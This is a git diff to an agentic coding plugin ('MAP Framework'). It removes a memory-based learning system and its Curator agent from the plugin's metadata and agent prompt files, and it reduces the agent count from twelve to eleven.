diff --git a/.claude-plugin/PLUGIN.md b/.claude-plugin/PLUGIN.md index 97da96d..e417882 100644 --- a/.claude-plugin/PLUGIN.md +++ b/.claude-plugin/PLUGIN.md @@ -4,15 +4,15 @@ Official Claude Code plugin for MAP Framework - Modular Agentic Planner with cog ## What is MAP Framework? -MAP (Modular Agentic Planner) is a cognitive architecture that orchestrates 12 specialized agents to improve code quality through systematic validation and iterative refinement. +MAP (Modular Agentic Planner) is a cognitive architecture that orchestrates 11 specialized agents to improve code quality through systematic validation and iterative refinement. **Based on research:** - [MAP Paper - Nature Communications (2025)](https://github.com/Shanka123/MAP) — 74% improvement in planning tasks -- [ACE Paper - arXiv:2510.04618v1](https://arxiv.org/abs/2510.04618v1) — continuous learning from experience + ## Features -### 12 Specialized Agents +### 11 Specialized Agents 1. **TaskDecomposer** — breaks goals into atomic subtasks 2. **Actor** — generates code and solutions @@ -20,21 +20,20 @@ MAP (Modular Agentic Planner) is a cognitive architecture that orchestrates 12 s 4. **Predictor** — analyzes change impact across codebase 5. **Evaluator** — scores solution quality (functionality, security, testability) 6. **Reflector** — extracts lessons from successes and failures -7. **Curator** — manages knowledge base (playbook) -8. **DocumentationReviewer** — checks documentation completeness -9. **Debate-Arbiter** — cross-evaluates variants with reasoning (Opus) -10. **Synthesizer** — merges multiple variants (Self-MoA) -11. **Research-Agent** — isolated codebase research -12. **Final-Verifier** — adversarial verification (Ralph Loop) +7. **DocumentationReviewer** — checks documentation completeness +8. **Debate-Arbiter** — cross-evaluates variants with reasoning (Opus) +9. **Synthesizer** — merges multiple variants (Self-MoA) +10. **Research-Agent** — isolated codebase research +11. **Final-Verifier** — adversarial verification (Ralph Loop) ### Claude Code Integration **5 Automated Hooks:** - `validate-agent-templates` — prevents accidental removal of template variables -- `auto-store-knowledge` — automatically saves successful patterns - `enrich-context` — enriches prompts with relevant knowledge -- `session-init` — loads ACE playbook at session start +- `session-init` — loads workflow context at session start - `track-metrics` — tracks agent performance +- `workflow-gate` — enforces workflow step sequencing **10 Slash Commands:** - `/map-efficient` — implement features, refactor code, complex tasks with full MAP workflow @@ -48,13 +47,6 @@ MAP (Modular Agentic Planner) is a cognitive architecture that orchestrates 12 s - `/map-resume` — resume interrupted workflows - `/map-learn` — extract and preserve lessons -### ACE Learning System - -- **Persistent Knowledge** — solutions saved and reused via mem0 MCP -- **Semantic Search** — find patterns by meaning (optional) -- **Quality Tracking** — monitor pattern effectiveness -- **Continuous Learning** — each workflow improves future ones - ### Cost Optimization Intelligent model selection per agent: @@ -95,11 +87,9 @@ cp map-framework/.claude/settings.hooks.json your-project/.claude/ ## Requirements - **Claude Code CLI** — installed and configured -- **MCP Servers** (essential): - - `claude-reviewer` — professional code review - - `sequential-thinking` — chain-of-thought reasoning **Recommended MCP Servers:** +- `sequential-thinking` — chain-of-thought reasoning - `context7` — library documentation - `deepwiki` — GitHub repository analysis @@ -146,8 +136,8 @@ cp map-framework/.claude/settings.hooks.json your-project/.claude/ │ └──────────┬───────────┘ │ │ │ │ │ ┌──────────▼───────────┐ │ - │ │ REFLECTOR → CURATOR │ │ - │ │ (learn → knowledge) │ │ + │ │ REFLECTOR │ │ + │ │ (learn → patterns) │ │ │ └──────────────────────┘ │ └──────────────────────────────────┘ ``` diff --git a/.claude-plugin/marketplace.json b/.claude-plugin/marketplace.json index 7491397..920ea46 100644 --- a/.claude-plugin/marketplace.json +++ b/.claude-plugin/marketplace.json @@ -18,7 +18,6 @@ "repository": "https://github.com/azalio/map-framework", "keywords": [ "MAP", - "ACE", "cognitive-architecture", "planning", "agents", @@ -32,8 +31,7 @@ "development" ], "features": [ - "12 specialized agents (TaskDecomposer, Actor, Monitor, Predictor, Evaluator, Reflector, Curator, DocumentationReviewer, Debate-Arbiter, Synthesizer, Research-Agent, Final-Verifier)", - "ACE learning system with persistent knowledge base", + "11 specialized agents (TaskDecomposer, Actor, Monitor, Predictor, Evaluator, Reflector, DocumentationReviewer, Debate-Arbiter, Synthesizer, Research-Agent, Final-Verifier)", "5 Claude Code hooks for automation", "10 slash commands (/map-efficient, /map-debug, /map-fast, /map-debate, /map-review, /map-check, /map-plan, /map-release, /map-resume, /map-learn)", "Professional code review integration", @@ -56,8 +54,7 @@ "hooks": "https://github.com/azalio/map-framework/blob/main/.claude/hooks/README.md" }, "research": { - "map_paper": "https://github.com/Shanka123/MAP", - "ace_paper": "https://arxiv.org/abs/2510.04618v1" + "map_paper": "https://github.com/Shanka123/MAP" } } ], diff --git a/.claude-plugin/plugin.json b/.claude-plugin/plugin.json index 3b4680b..4b7c702 100644 --- a/.claude-plugin/plugin.json +++ b/.claude-plugin/plugin.json @@ -1,14 +1,13 @@ { "name": "map-framework", "version": "1.0.0", - "description": "Modular Agentic Planner (MAP) - Cognitive architecture for AI agents with 12 specialized agents, ACE learning system, and professional code review integration", + "description": "Modular Agentic Planner (MAP) - Cognitive architecture for AI agents with 11 specialized agents and professional code review integration", "author": "azalio", "license": "MIT", "repository": "https://github.com/azalio/map-framework", "homepage": "https://github.com/azalio/map-framework", "keywords": [ "MAP", - "ACE", "cognitive-architecture", "planning", "agents", @@ -34,8 +33,7 @@ ] }, "features": [ - "12 specialized MAP agents (TaskDecomposer, Actor, Monitor, Predictor, Evaluator, Reflector, Curator, DocumentationReviewer, Debate-Arbiter, Synthesizer, Research-Agent, Final-Verifier)", - "ACE (Agentic Context Engineering) learning system with persistent knowledge base", + "11 specialized MAP agents (TaskDecomposer, Actor, Monitor, Predictor, Evaluator, Reflector, DocumentationReviewer, Debate-Arbiter, Synthesizer, Research-Agent, Final-Verifier)", "5 Claude Code hooks for automation (validate-agent-templates, auto-store-knowledge, enrich-context, session-init, track-metrics)", "10 slash commands (/map-efficient, /map-debug, /map-fast, /map-debate, /map-review, /map-check, /map-plan, /map-release, /map-resume, /map-learn)", "Professional code review with claude-reviewer MCP", @@ -66,7 +64,6 @@ "evaluator", "orchestrator", "reflector", - "curator", "documentation-reviewer" ], "commands": [ diff --git a/.claude/agents/actor.md b/.claude/agents/actor.md index 97fa53e..7ec0a71 100644 --- a/.claude/agents/actor.md +++ b/.claude/agents/actor.md @@ -12,10 +12,9 @@ last_updated: 2025-11-27 ┌─────────────────────────────────────────────────────────────────────┐ │ ACTOR AGENT PROTOCOL │ ├─────────────────────────────────────────────────────────────────────┤ -│ 1. mcp__mem0__map_tiered_search → BEFORE any implementation │ -│ 2. Implement complete code → No placeholders, no ellipsis │ -│ 3. Handle ALL errors → Explicit try/catch, no silent fails │ -│ 4. Document trade-offs → Alternatives considered, why chosen │ +│ 1. Implement complete code → No placeholders, no ellipsis │ +│ 2. Handle ALL errors → Explicit try/catch, no silent fails │ +│ 3. Document trade-offs → Alternatives considered, why chosen │ ├─────────────────────────────────────────────────────────────────────┤ │ REQUIRED: Use Edit/Write tools to apply code directly │ │ NEVER: Modify outside {{allowed_scope}} | Skip error handling │ @@ -82,20 +81,9 @@ This enables Synthesizer to extract and resolve decisions across variants. # MCP Tool Integration (Single Source of Truth) -## Mandatory Tools (Every Implementation) - -### 1. mcp__mem0__map_tiered_search — BEFORE Implementation -**Purpose**: Learn from past solutions, avoid repeating mistakes -**When**: ALWAYS, even for simple tasks -**Query Format**: `"[technology] [feature] implementation"` or `"[error type] solution"` - -**Note**: Actors no longer store patterns directly. After Monitor approval, run `/map-learn` to trigger Reflector → Curator → mem0 storage. - ---- - ## Research Tools (Optional — Use When Knowledge Gap Exists) -**Decision Rule**: Use if unfamiliar library/algorithm/architecture. Skip if existing patterns cover it. +**Decision Rule**: Use if unfamiliar library/algorithm/architecture. | Trigger | Tool | Purpose | |---------|------|---------| @@ -105,13 +93,7 @@ This enables Synthesizer to extract and resolve decisions across variants. ### Tool Selection Flowchart ``` -START → mcp__mem0__map_tiered_search (ALWAYS) - ↓ -Found relevant pattern in mem0? - YES → Apply pattern, implement - NO → Continue research - ↓ -Using external library? +START → Using external library? YES → context7: resolve-library-id → get-library-docs NO → Continue ↓ @@ -130,40 +112,6 @@ Monitor will validate written code ## Handling MCP Tool Responses -### mcp__mem0__map_tiered_search Results - -**Re-rank retrieved patterns** before use: -``` -FOR each pattern in results: - relevance_score = 0 - IF pattern.domain matches subtask_domain: relevance_score += 2 - IF pattern.language == {{language}}: relevance_score += 1 - IF pattern.created_at > (now - 30_days): relevance_score += 1 - IF pattern.metadata.validated == true: relevance_score += 1 - IF abs(pattern.complexity - subtask.complexity) <= 2: relevance_score += 1 - -SORT by relevance_score DESC -USE top 3 patterns (discard low-relevance noise) -``` - -**Multiple patterns found**: -- Apply re-ranking algorithm above -- Prefer highest relevance_score (not just most recent) -- Prefer patterns marked "validated" or "production" -- Document selection rationale in Trade-offs - -**Conflicting patterns**: -```yaml -conflict: "Pattern A says X, Pattern B says Y" -resolution: "Using Pattern A (higher relevance score: domain match + validated)" -action: "Document conflict in Trade-offs for Monitor review" -``` - -**Empty results**: -- Document: "No similar patterns in mem0. Novel implementation." -- Increase test coverage for unvalidated approach -- Flag in Trade-offs for extra Monitor scrutiny - ### context7 / deepwiki Results **Unclear or incomplete docs**: @@ -183,16 +131,9 @@ mitigation: "Added version check, comprehensive tests" **Library Implementation**: ``` -mcp__mem0__map_tiered_search("[library] implementation") - → (if no patterns) context7: get-library-docs +context7: get-library-docs → (if architecture unclear) deepwiki: ask_question - → implement → /map-learn (after approval) -``` - -**Algorithm Implementation**: -``` -mcp__mem0__map_tiered_search("[algorithm] implementation") - → review, adapt, test → /map-learn (after approval) + → implement ``` --- @@ -203,18 +144,8 @@ When multiple sources provide conflicting guidance, follow this priority (highes 1. **Explicit human instruction** in subtask description 2. **Security constraints** (NEVER override) -3. **mem0 patterns** (validated past patterns from tiered search) -4. **Research tools** (context7, deepwiki) -5. **Training data** (fallback) - -**Example conflict resolution**: -```yaml -conflict: - mem0_pattern_1: "Use polling for real-time updates" - mem0_pattern_2: "Use webhooks for real-time updates" -resolution: "Using pattern with higher relevance score and more recent validation" -action: "Document in Trade-offs for Monitor review" -``` +3. **Research tools** (context7, deepwiki) +4. **Training data** (fallback) @@ -262,8 +193,7 @@ Task( ## Skip Research If - Task is self-contained (new file, no dependencies) -- mem0 already has the pattern you need -- mcp__mem0__map_tiered_search returned sufficient context +- Existing patterns from context already cover the need --- @@ -309,7 +239,7 @@ Explain solution strategy in 2-3 sentences. Include: - MCP tools used and what they informed (if any) -"Implementing rate limiting using token bucket algorithm. mcp__mem0__map_tiered_search found similar pattern (impl-0089) for Redis-based limiting. Adapted for in-memory use per requirements." +"Implementing rate limiting using token bucket algorithm. Adapted standard Redis-based limiting pattern for in-memory use per requirements." ## 3. Code Changes @@ -407,18 +337,7 @@ VC1: - Tests: path/to/test_file.ext::test_name (or N/A with reason) ``` -## 7. Used Patterns (ACE Learning) - -**Format**: `["impl-0012", "sec-0034"]` or `[]` if none - -**How to identify pattern IDs**: -- Scan `{{existing_patterns}}` for your subtask's domain -- Note IDs you actually referenced during implementation -- Format in mem0: `[impl-0042] Description: ...` - -**If no patterns match**: `[]` with note "No relevant patterns in current mem0" - -## 8. Integration Notes (If Applicable) +## 7. Integration Notes (If Applicable) Only include if changes affect: - Database schema (migrations needed?) @@ -456,8 +375,7 @@ Only include if changes affect: - [ ] **Dependencies**: Known vulnerabilities checked (if new deps) ### MCP Compliance -- [ ] mcp__mem0__map_tiered_search called before implementation -- [ ] Research tools used if knowledge gap existed +- [ ] Research tools used if knowledge gap existed (context7, deepwiki) - [ ] Fallback documented if tools unavailable ### Output Completeness @@ -465,7 +383,6 @@ Only include if changes affect: - [ ] Trade-offs documented with alternatives - [ ] Test cases cover happy + edge + error paths - [ ] Each `validation_criteria` item has at least one automated test (or explicit N/A with reason) -- [ ] Used patterns tracked (or `[]` if none) - [ ] Template variables `{{...}}` preserved in generated code ### SFT Comfort Zone (Token Discipline) @@ -632,17 +549,6 @@ output: default: "Will implement read-through unless directed otherwise" ``` -## When mem0 Patterns Conflict - -```yaml -output: - status: PATTERN_CONFLICT - bullets: ["impl-0012", "impl-0089"] - conflict: "impl-0012 recommends polling, impl-0089 recommends webhooks" - analysis: "impl-0089 is newer, has better rationale for real-time needs" - resolution: "Using impl-0089 pattern - please confirm or override" -``` - ## When Implementation Exceeds Scope **Target**: 50-300 lines per subtask @@ -680,15 +586,14 @@ output: # for the completed portions ``` -## When All Tools Unavailable (Degraded Mode) +## When All Research Tools Unavailable (Degraded Mode) -If mcp__mem0__map_tiered_search AND research tools all fail: +If all research tools fail: ```yaml output: status: DEGRADED_MODE limitations: - - "mcp__mem0__map_tiered_search: timeout after 3 attempts" - "context7: service unavailable" - "deepwiki: connection refused" confidence: LOW @@ -751,30 +656,6 @@ Focus on: - - - -## Available Patterns (ACE Learning) - -{{#if existing_patterns}} - -**How to read pattern IDs**: `[category-NNNN]` where category = impl|sec|test|perf|arch|err - -{{existing_patterns}} - -**Usage**: -1. Identify relevant patterns by domain/technology -2. Apply patterns directly (adapt, don't copy) -3. Track applied pattern IDs in "Used Patterns" section - -{{/if}} - -{{#unless existing_patterns}} -*No patterns available yet. Your implementation will seed mem0 via /map-learn. Be extra thorough.* -{{/unless}} - - - --- # ===== REFERENCE MATERIAL ===== @@ -862,7 +743,7 @@ Default: **Subtask**: "Create user registration endpoint" -**Approach**: POST /api/register with email/password validation, bcrypt hashing, JWT response. mcp__mem0__map_tiered_search found sec-0012 (password hashing) and impl-0034 (validation patterns). +**Approach**: POST /api/register with email/password validation, bcrypt hashing, JWT response. Using standard password hashing and validation patterns. **Code Changes**: @@ -933,7 +814,6 @@ def register(): 6. test_register_sql_injection_safe 7. test_register_token_decodes_correctly -**Used Patterns**: `["sec-0012", "impl-0034"]` --- @@ -941,7 +821,7 @@ def register(): **Subtask**: "Add rate limiting to existing API endpoint" -**Approach**: Token bucket rate limiting using existing Redis connection. 100 req/min per IP. mcp__mem0__map_tiered_search found impl-0089 (Redis patterns). +**Approach**: Token bucket rate limiting using existing Redis connection. 100 req/min per IP. Using standard Redis rate limiting patterns. **Code Changes**: @@ -1022,7 +902,6 @@ def get_data(): 4. test_rate_limit_per_ip_isolation 5. test_rate_limit_headers_present -**Used Patterns**: `["impl-0089"]` --- @@ -1058,7 +937,7 @@ recommendation: "Option 1 - clean solution worth scope expansion" **Subtask**: "Implement WebSocket reconnection logic" -**Approach**: Exponential backoff reconnection. mcp__mem0__map_tiered_search empty. context7 timed out. Implemented standard pattern with documented fallback. +**Approach**: Exponential backoff reconnection. context7 timed out. Implemented standard pattern with documented fallback. **Code Changes**: ```typescript @@ -1107,6 +986,4 @@ export class ReconnectingWebSocket { 3. test_reconnect_max_attempts_triggers_callback 4. test_reconnect_handles_immediate_disconnect -**Used Bullets**: `[]` (No similar patterns in mem0. Novel implementation.) - diff --git a/.claude/agents/documentation-reviewer.md b/.claude/agents/documentation-reviewer.md index 932dc07..90417c3 100644 --- a/.claude/agents/documentation-reviewer.md +++ b/.claude/agents/documentation-reviewer.md @@ -119,11 +119,6 @@ ELSE: → Use Fetch + manual README.md analysis → Log: "deepwiki unavailable, architecture analysis limited" -IF mcp__mem0__* available: - → Use for historical pattern matching -ELSE: - → Skip pattern matching, rely on explicit checks only - → Log: "mem0 unavailable, no historical context" ``` ## Fallback Protocol @@ -441,12 +436,6 @@ mcp__deepwiki__ask_question( question="How does Gatekeeper handle CRD installation?" ) -# 4. Check historical patterns (if mem0 available) -mcp__mem0__map_tiered_search( - query="CRD installation documentation patterns", - limit=5, - similarity_threshold=0.7 -) ``` --- @@ -709,14 +698,6 @@ mcp__mem0__map_tiered_search( **Documentation to Review**: {{subtask_description}} -{{#if existing_patterns}} -## Relevant mem0 Knowledge - -{{existing_patterns}} - -**Use these patterns** to identify common documentation issues and prioritize checks. -{{/if}} - {{#if feedback}} ## Previous Review Feedback diff --git a/.claude/agents/evaluator.md b/.claude/agents/evaluator.md index 96a098b..5bc965a 100644 --- a/.claude/agents/evaluator.md +++ b/.claude/agents/evaluator.md @@ -257,13 +257,6 @@ Scoring Context Decision: ALWAYS: → sequentialthinking (systematic quality analysis: break down dimensions, evaluate trade-offs, ensure consistency) -IF complex architectural decisions: - → mcp__mem0__map_tiered_search: "quality metrics [feature]", "performance benchmark [op]", "best practice score [tech]" - -IF learning from past evaluation reasoning: - → mcp__mem0__map_tiered_search: "quality assessment for [feature]", "scoring rationale [pattern]" - → Understand WHY past implementations scored high/low, apply reasoning - IF previous implementations exist: → get_review_history (compare solutions, learn from past issues, maintain scoring consistency) @@ -436,17 +429,12 @@ Thought 7: Generate recommendation with research feedback **Use When**: Check consistency with past implementations **Rationale**: Maintain consistent standards (e.g., if past testability scored 8/10, use same criteria). Prevents score inflation/deflation. -### 3. mcp__mem0__map_tiered_search -**Use When**: Need quality benchmarks/best practices from memory -**Queries**: `"quality metrics [feature]"`, `"performance benchmark [op]"`, `"best practice score [tech]"`, `"test coverage standard [component]"` -**Rationale**: Quality is relative—DB query performance ≠ API performance. Mem0 provides domain-specific baselines from stored patterns. - -### 4. mcp__context7__get-library-docs +### 3. mcp__context7__get-library-docs **Use When**: Solution uses external libraries/frameworks **Process**: `resolve-library-id` → `get-library-docs(topics: best-practices, performance, security, testing)` **Rationale**: Libraries define quality standards (React testing, Django security). Validate solutions follow these. -### 5. mcp__deepwiki__ask_question +### 4. mcp__deepwiki__ask_question **Use When**: Need industry standard comparisons **Queries**: "What metrics does [repo] use for [feature]?", "How do top projects test [feature]?", "Performance benchmarks for [op]?" **Rationale**: Learn from production code. If top projects achieve 90% auth coverage, that's a valid benchmark. @@ -454,7 +442,6 @@ Thought 7: Generate recommendation with research feedback **IMPORTANT**: - ALWAYS use sequential thinking for complex analysis -- Search mem0 for domain-specific benchmarks - Get review history to maintain consistency - Validate against library best practices - Document which MCP tools informed scores @@ -817,7 +804,6 @@ SCORING CONSISTENCY VALIDATION: → Checked existing_patterns for similar implementations → Compared against scoring rubric thresholds (8-9 = meets all, 6-7 = meets core) → Considered project conventions ({{language}}, {{framework}} best practices) - → Used mcp__mem0__map_tiered_search to find similar past evaluations for calibration → NOT scoring in isolation without context [ ] **4. Consistency with Criteria** - Do my scores map to the published scoring rubric? @@ -852,7 +838,6 @@ SCORING CONSISTENCY VALIDATION: [ ] **8. Comparative Context** - Did I explain if this score is typical/atypical for the subtask type? → Noted if score is above/below average for similar subtasks → Explained why unusually high/low scores occurred - → Referenced past implementations if available (mem0 search) → Provided context: "8/10 is typical for CRUD features" vs "8/10 is exceptional for complex algorithm" → NOT scoring without explaining relative performance @@ -874,9 +859,9 @@ SCORING CONSISTENCY VALIDATION: **Why This Checklist Matters**: -Evaluator is the **final quality gate** before Reflector/Curator learning begins. Inconsistent scoring pollutes downstream processes: +Evaluator is the **final quality gate** before downstream processes. Inconsistent scoring pollutes workflow: -1. **Inconsistent scores** → Curator can't trust helpful_count thresholds → memory quality degrades +1. **Inconsistent scores** → Downstream agents cannot trust evaluation signals 2. **False positives** → Actor wastes iteration cycles on non-issues → workflow stalls 3. **Missing dimensions** → Critical gaps (security, performance) overlooked → production failures 4. **Vague justifications** → Actor doesn't understand what to improve → repeats mistakes @@ -885,7 +870,6 @@ Each checklist item prevents a specific failure mode. Systematic validation ensu - **Scoring consistency** across subtasks (same code quality → same score) - **Evidence-based decisions** (not gut feelings) - **Clear feedback** for Actor (actionable improvements) -- **Trustworthy signals** for Curator (reliable helpful_count) @@ -939,7 +923,7 @@ Output MUST be valid JSON. Orchestrator parses this programmatically. Invalid JS "next_steps": [ "Concrete action to improve (if recommendation != 'proceed')" ], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search"] + "mcp_tools_used": ["sequentialthinking"] } ``` @@ -1208,7 +1192,7 @@ def calculate_user_discount( "completeness": "9/10 - Very complete: code, tests, comprehensive docs, error handling, logging. Missing 1 point: no deployment notes or performance benchmarks." }, "next_steps": [], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search"] + "mcp_tools_used": ["sequentialthinking"] } ``` @@ -1261,7 +1245,7 @@ def calculate_user_discount( "Add type hints and docstring", "Add structured logging for debugging" ], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search", "get-library-docs"] + "mcp_tools_used": ["sequentialthinking", "get-library-docs"] } ``` @@ -1317,7 +1301,7 @@ def calculate_user_discount( "Add structured logging for debugging and monitoring", "Add docstrings and type hints throughout" ], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search"] + "mcp_tools_used": ["sequentialthinking"] } ``` @@ -1374,7 +1358,7 @@ def calculate_user_discount( "Add comprehensive authorization tests", "Document security considerations in API docs" ], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search"] + "mcp_tools_used": ["sequentialthinking"] } ``` @@ -1439,7 +1423,7 @@ def calculate_user_discount( "Add extensive tests including: successful payment, declined card, timeout, network failure, duplicate prevention", "Consider using payment SDK instead of raw API calls for built-in security" ], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search", "get-library-docs", "deepwiki"] + "mcp_tools_used": ["sequentialthinking", "get-library-docs", "deepwiki"] } ``` @@ -1453,8 +1437,7 @@ def calculate_user_discount( **Before returning your evaluation JSON:** 1. ✅ Did I use sequential thinking for quality analysis? -2. ✅ Did I search mem0 for quality benchmarks relevant to this feature? -3. ✅ Did I check review history for consistency with past scores? +2. ✅ Did I check review history for consistency with past scores? 4. ✅ Are all scores (0-10) justified with specific evidence? 5. ✅ Is overall_score calculated correctly using weighted formula? 6. ✅ Is recommendation based on decision tree logic? diff --git a/.claude/agents/monitor.md b/.claude/agents/monitor.md index 807ef53..a4ed12f 100644 --- a/.claude/agents/monitor.md +++ b/.claude/agents/monitor.md @@ -276,8 +276,6 @@ IF code uses external libraries: → Run resolve-library-id + get-library-docs IF complex logic detected (≥3 nested conditionals, state machines, async): → Run sequentialthinking with structured thoughts -IF similar code reviewed before: - → Run mcp__mem0__map_tiered_search with pattern query IF detected_language != "unknown": → Consider language-specific static analysis tools @@ -445,13 +443,13 @@ IF Actor disputes a finding: ### Pattern Conflict Resolution ```text -IF mem0 pattern conflicts with dimension requirement: +IF learned pattern conflicts with dimension requirement: → Security/Correctness dimensions WIN (non-negotiable) - → Code-quality/Style dimensions: mem0 pattern wins + → Code-quality/Style dimensions: learned pattern wins → Document conflict in feedback_for_actor Example: - mem0 pattern: "Allow single-letter vars in list comprehensions" + Learned pattern: "Allow single-letter vars in list comprehensions" Dimension 3: "Clear naming required" → Allow 'x' in: [x*2 for x in items] → Block 'x' in: def calculate(x, y, z) @@ -467,7 +465,7 @@ Example: **CRITICAL**: Comprehensive code review requires multiple perspectives. Use ALL relevant MCP tools to catch issues that single-pass review might miss. -Code review quality directly impacts production stability. MCP tools provide: (1) professional AI review baseline, (2) historical pattern matching for known issues, (3) library-specific best practices, (4) industry standard comparisons. Using these tools catches 3-5x more issues than manual review alone. +Code review quality directly impacts production stability. MCP tools provide: (1) professional AI review baseline, (2) library-specific best practices, (3) industry standard comparisons. Using these tools catches 3-5x more issues than manual review alone. ### Tool Selection Decision Framework @@ -476,16 +474,16 @@ Code review quality directly impacts production stability. MCP tools provide: (1 Review Scope Decision: Implementation Code: - → request_review (AI baseline) → mcp__mem0__map_tiered_search (known patterns) + → request_review (AI baseline) → get-library-docs (external libs) → sequentialthinking (complex logic) → deepwiki (security patterns) Documentation: → Glob/Read (find source of truth) → Fetch (validate URLs) - → mcp__mem0__map_tiered_search (anti-patterns) → ESCALATE if inconsistent + → ESCALATE if inconsistent Test Code: - → mcp__mem0__map_tiered_search (test patterns) → get-library-docs (framework practices) + → get-library-docs (framework practices) → Verify coverage expectations ``` @@ -503,25 +501,7 @@ request_review({ }) ``` -### 2. mcp__mem0__map_tiered_search -**Use When**: Check known issues/anti-patterns from memory -**Parameters**: `query` (search string), `category` (optional filter) -**Queries**: `"code review issue [pattern]"`, `"security vulnerability [code]"`, `"anti-pattern [tech]"`, `"test anti-pattern [type]"` -**Rationale**: Past issues repeat—prevent regressions by searching learned patterns - -**Re-rank results** by relevance to current review: -``` -FOR each pattern in results: - relevance_score = 0 - IF pattern.category matches review_dimension: relevance_score += 2 - IF pattern.language == {{language}}: relevance_score += 1 - IF pattern.severity in {critical, high}: relevance_score += 1 - IF pattern.validated == true: relevance_score += 1 -SORT by relevance_score DESC -USE top 3 patterns for issue detection -``` - -### 3. mcp__sequential-thinking__sequentialthinking +### 2. mcp__sequential-thinking__sequentialthinking **Use When**: Complex logic requiring systematic trace (see triggers below) **Complexity Triggers** (use sequentialthinking if ANY apply): @@ -542,18 +522,18 @@ Thought N+1: Check for unreachable code or logic gaps Conclusion: List issues found with line numbers ``` -### 4. mcp__context7__get-library-docs +### 3. mcp__context7__get-library-docs **Use When**: Code uses external libraries/frameworks **Process**: `resolve-library-id` → `get-library-docs(library_id, topic)` **Topics**: best-practices, security, error-handling, performance, deprecated-apis **Rationale**: Current docs prevent deprecated APIs and missing security features -### 5. mcp__deepwiki__ask_question +### 4. mcp__deepwiki__ask_question **Use When**: Validate security/architecture patterns **Queries**: "How does [repo] handle [concern]?", "Common mistakes in [feature]?" **Rationale**: Learn from battle-tested production code -### 6. Fetch Tool (Documentation Review Only) +### 5. Fetch Tool (Documentation Review Only) **Use When**: Reviewing documentation that mentions external projects/URLs **Process**: Extract URLs → Fetch each → Verify dependencies documented **Rationale**: External integrations have hidden dependencies (CRDs, adapters) @@ -561,7 +541,6 @@ Conclusion: List issues found with line numbers **IMPORTANT**: - Use request_review FIRST for all code reviews -- Always search mem0 for known patterns before marking valid - Get current library docs for ANY external library used - Use sequential thinking for complex logic validation - Document which MCP tools you used in your review summary @@ -574,7 +553,6 @@ Conclusion: List issues found with line numbers Tool | Timeout | Action on Timeout ------------------------|---------|---------------------------------- request_review | 5 min | Proceed to manual 10-dimension review -map_tiered_search | 2 min | Skip, note in summary, proceed sequentialthinking | 5 min | Manual trace critical paths get-library-docs | 3 min | Use deepwiki or Fetch as fallback deepwiki | 3 min | Skip pattern validation, proceed @@ -596,11 +574,6 @@ IF request_review fails or times out (>5 min): → Note "MCP baseline unavailable" in summary → Apply extra scrutiny to security dimension -IF map_tiered_search returns empty results: - → This is NORMAL for new codebases or novel patterns - → Do NOT treat as blocking - → Proceed with standard review - IF get-library-docs unavailable or library not indexed: → Use deepwiki to search for library patterns → Use Fetch for official documentation URLs @@ -628,7 +601,6 @@ Priority 1: Manual Review (human-level logic) → Trust tools for SYNTAX errors, type mismatches, style violations Priority 2: Security-focused tools - → map_tiered_search (known vulnerabilities) > request_review (general) → deepwiki (production patterns) > get-library-docs (generic docs) Priority 3: Specificity @@ -656,7 +628,6 @@ Priority 4: Severity | Short Name | Full MCP Name | Category | |------------|---------------|----------| | `request_review` | `mcp__claude-reviewer__request_review` | AI Review | -| `map_tiered_search` | `mcp__mem0__map_tiered_search` | Knowledge | | `sequentialthinking` | `mcp__sequential-thinking__sequentialthinking` | Analysis | | `get_library_docs` | `mcp__context7__get-library-docs` | Docs | | `resolve_library_id` | `mcp__context7__resolve-library-id` | Docs | @@ -692,28 +663,6 @@ Priority 4: Severity **Key Fields**: `findings[].line`, `findings[].severity`, `findings[].message` **Integration**: Convert each finding to Monitor issue format, map type→category -#### map_tiered_search Response -```json -{ - "results": [ - { - "id": "mem-uuid", - "memory": "Pattern: Always validate JWT expiry before processing", - "score": 0.95, - "metadata": { - "category": "security", - "source": "auth-service", - "created_at": "2024-01-15T10:30:00Z" - } - } - ], - "total": 3, - "query": "JWT validation patterns" -} -``` -**Key Fields**: `results[].memory`, `results[].score` (>0.8 = highly relevant) -**Integration**: Empty results is NORMAL for new codebases - proceed without error - #### sequentialthinking Response ```json { @@ -965,8 +914,7 @@ def divide(a, b): 2. Verify parameterized queries (no string interpolation) 3. Check command execution (no shell=True with user input) 4. Validate file paths (no path traversal) -5. Search mem0 for known vulnerabilities: `"security vulnerability [language]"` -6. Use deepwiki to check production security patterns +5. Use deepwiki to check production security patterns #### Pass Criteria - All inputs validated with allowlist approach @@ -1401,7 +1349,7 @@ ELSE: ``` **Research Triggers**: React, Next.js, Django, FastAPI, rate limiting, webhook handling, distributed systems -**Valid Skips**: Pattern in mem0, language primitives only, deep expertise, first principles +**Valid Skips**: Language primitives only, deep expertise, first principles **DO NOT block** for missing research if: @@ -1551,7 +1499,7 @@ Before returning JSON, verify: "failed_checks": [], "feedback_for_actor": "Implementation is solid. No changes required.", "estimated_fix_time": "5 minutes", - "mcp_tools_used": ["request_review", "map_tiered_search"] + "mcp_tools_used": ["request_review"] } ``` @@ -1666,7 +1614,7 @@ Do NOT invent issues to justify review effort. Empty `issues` array is valid. "type": "array", "items": { "type": "string", - "enum": ["request_review", "map_tiered_search", "map_add_pattern", "sequentialthinking", "get_library_docs", "resolve_library_id", "deepwiki", "glob", "read", "fetch"] + "enum": ["request_review", "sequentialthinking", "get_library_docs", "resolve_library_id", "deepwiki", "glob", "read", "fetch"] }, "description": "MCP tools successfully used during review" }, @@ -1674,7 +1622,7 @@ Do NOT invent issues to justify review effort. Empty `issues` array is valid. "type": "array", "items": { "type": "string", - "enum": ["request_review", "map_tiered_search", "map_add_pattern", "sequentialthinking", "get_library_docs", "resolve_library_id", "deepwiki", "glob", "read", "fetch"] + "enum": ["request_review", "sequentialthinking", "get_library_docs", "resolve_library_id", "deepwiki", "glob", "read", "fetch"] }, "description": "MCP tools that failed or timed out" }, @@ -1821,7 +1769,7 @@ IF map-planning workflow active AND valid === true: "failed_checks": ["testability", "documentation"], "feedback_for_actor": "Actionable guidance with specific steps (reference dimensions: 'Security dimension failed: add input validation' or 'Dimension 2 (Security): missing rate limiting')", "estimated_fix_time": "5 minutes|30 minutes|2 hours|4 hours", - "mcp_tools_used": ["request_review", "map_tiered_search"] + 